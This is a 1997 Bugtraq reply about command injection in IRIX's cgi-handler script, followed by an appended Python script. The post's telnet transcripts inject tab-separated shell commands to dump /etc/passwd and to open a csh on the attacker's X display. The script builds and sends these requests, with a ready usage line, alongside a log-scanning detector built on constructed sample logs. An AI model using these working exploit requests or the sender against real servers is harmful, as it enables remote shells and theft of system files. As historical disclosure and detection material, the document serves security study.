Bugtraq mailing list archives

Re: CPSR 7: IRIX WWW Server
From: balu () STUDST FH-MUENSTER DE (Thomas Walter)
Date: Thu, 24 Jul 1997 17:51:56 +0200


Hiho...

[Corinne Posse Relaeses wrote]
Quite a while ago, Razvan Dragomirescu (drazvan () kappa ro) released a
report on the default cgi-handler scripts that ship with IRIX systems
with web servers, and some other web server programs. Just like with
the phf bug, with the cgi-handler bug a malicious user could start
an xterm from the server machine on their own system.

Example:

telnet www.highly.respectable.bank.com 80
Trying 300.300.300.1...
Connected to www.highly.respectable.bank.com
Escape character is '^]'.
GET /cgi-bin/handler/blah;xwsh  -display   yourhost.com|?data=Download

Please note the format of the "GET" query. The above assumes xwsh is
in the PATH somewhere, and the "space" between "xwsh" and "-display" should be
a TAB.

I've got some problems while trying that...
First it seems that xwsh was not in the path, so I tried to call
xwsh with a given path (note that all whitespace after GET
/cgi-bin/handler/ must be tabs...):

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/ ;/usr/sbin/xwsh  -display  enemy:0|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

That opened the xwsh window... But there was only one error message in
the first line:

/usr/sbin/xwsh: Permission denied: can't start command

Hm - what could that be? Doesn't matter - let's see what I can do with
other commands... (Remember the tabs...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/   ;cat    /etc/passwd|?data=Download
UX:sh (sh): ERROR: root:x:0:0:Super-User:/:/bin/csh
sysadm:x:0:0:System V Administration:/usr/admin:/bin/sh
[... I won't give you that ;) ...]
nobody:x:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
[... and again some more ...]
Connection closed by foreign host.

Hm - a shadowed passwd... was my first thought... Let's see if I can get
the shadow... [As above] - Didn't work. So it seems that the WWW server
was not running as root (what a pity ;). If it does not run as root, it
usually runs as nobody. And what can we see above? Nobody got the shell
/dev/null - that's why my xwsh was not able to start a command. Next try
was to give xwsh the command that it should start... (And again: tabs! -
and of course everything in one line...)

enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh  -display  enemy:0  -e  /bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%

And voila! - What else do you want? Any other programs to start? Just
try...

Brgds
     Balu
--
                                                            /'^'\
Please note: english is not my mother tongue               ( o o )
-------------------------------------------------------oOOO--(_)--OOOo
E-Mail: balu () studst fh-muenster de
Snail Mail: Thomas Walter
            Wemhoefer Stiege 10a, 48565 Burgsteinfurt   .oooO
or          Broxtermannstr.12, 49082 Osnabrueck, GERMANY(   )   Oooo.
---------------------------------------------------------\ (----(   )-
                                                          \_)    ) /
                                                                (_/
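Added example, not part of the post above and not IRIX's own code: a small Python script that covers the two things the telnet transcripts make awkward to reproduce. It builds the raw request bytes with real TAB characters between the command words (the post's point that the separator must be a tab, not a space), and it scans web-server access-log lines for the same request shape. The host, port, log lines and the detection rule (any shell `;` or `|` in the handler's PATH_INFO, after percent-decoding) are assumptions made for illustration; the log lines are constructed, not captured traffic.

```python
import re
import socket
from urllib.parse import unquote

# Constructed for this example: the path of the IRIX cgi-handler script and
# the query suffix the post appends to every request.
HANDLER_PATH = "/cgi-bin/handler/"
QUERY_SUFFIX = "?data=Download"


def build_handler_request(argv, path=HANDLER_PATH, suffix=QUERY_SUFFIX):
    """Return the raw HTTP/0.9-style request line the post types into telnet.

    argv is the command and its arguments, e.g. ["cat", "/etc/passwd"].
    The words are joined with TAB because (per the post) the handler refuses
    spaces but lets tabs through to the shell. Bytes are returned so the tabs
    reach the wire unchanged.
    """
    if not argv:
        raise ValueError("argv must contain at least the command")
    for word in argv:
        # A space would be rejected by the handler; a tab inside a word would
        # silently split it into two arguments. Refuse both up front.
        if any(ch in word for ch in " \t\r\n"):
            raise ValueError(f"whitespace not allowed inside a word: {word!r}")
    command = "\t".join(argv)
    return f"GET {path};{command}|{suffix}\r\n".encode("ascii")


def send_raw(host, port, request, timeout=10.0):
    """Send the raw request and return everything the server writes back.

    The injected command's stdout (the /etc/passwd dump in the post) comes
    back in this response; a command that only opens an X window returns
    nothing, exactly as the post's transcripts show.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed NCSA-style access-log lines (not real traffic): two requests in
# the shape the post describes, one with literal tabs and one with %09-encoded
# tabs, plus one legitimate download through the handler.
SAMPLE_LOG = [
    '1.2.3.4 - - [24/Jul/1997:17:51:56 +0200] '
    '"GET /cgi-bin/handler/;cat\t/etc/passwd|?data=Download" 200 1234',
    '1.2.3.4 - - [24/Jul/1997:17:52:10 +0200] '
    '"GET /cgi-bin/handler/;/usr/sbin/xwsh%09-display%09enemy:0%09-e%09'
    '/bin/csh|?data=Download" 200 0',
    '5.6.7.8 - - [24/Jul/1997:18:00:00 +0200] '
    '"GET /cgi-bin/handler/docs/report.txt?data=Download HTTP/1.0" 200 5120',
]

# The quoted request field: method, one space, then the target up to the next
# space or quote. [^" ] deliberately admits TAB, so a literal tab in the
# target is kept instead of ending the match early.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>[^" ]+)')


def is_handler_injection(log_line):
    """Return the decoded PATH_INFO when the line looks like handler abuse,
    else None.

    Rule (an assumption for this example): a request under HANDLER_PATH whose
    PATH_INFO, i.e. the target before '?', contains a shell ';' or '|'. The
    query string is split off before percent-decoding so an encoded '?' cannot
    shift the boundary, and decoding afterwards means %09 tabs and %3B
    semicolons do not hide the pattern.
    """
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    path_info = unquote(m.group("target").split("?", 1)[0])
    if not path_info.startswith(HANDLER_PATH):
        return None
    if ";" in path_info or "|" in path_info:
        return path_info
    return None


def scan_log(lines):
    """Return (line_number, path_info) for every suspicious line."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            if (hit := is_handler_injection(line)) is not None]


if __name__ == "__main__":
    print(repr(build_handler_request(["cat", "/etc/passwd"])))
    for n, hit in scan_log(SAMPLE_LOG):
        print(f"line {n}: shell metacharacters in handler PATH_INFO: {hit!r}")
```

To actually send a request, call `send_raw("victim", 80, build_handler_request(["cat", "/etc/passwd"]))`; the host name is the post's placeholder, not a real target. The detector keys on metacharacters in PATH_INFO rather than on the tab alone, because the tab is only the post's workaround for the handler's space check; the thing worth alerting on is the shell separator reaching the handler at all.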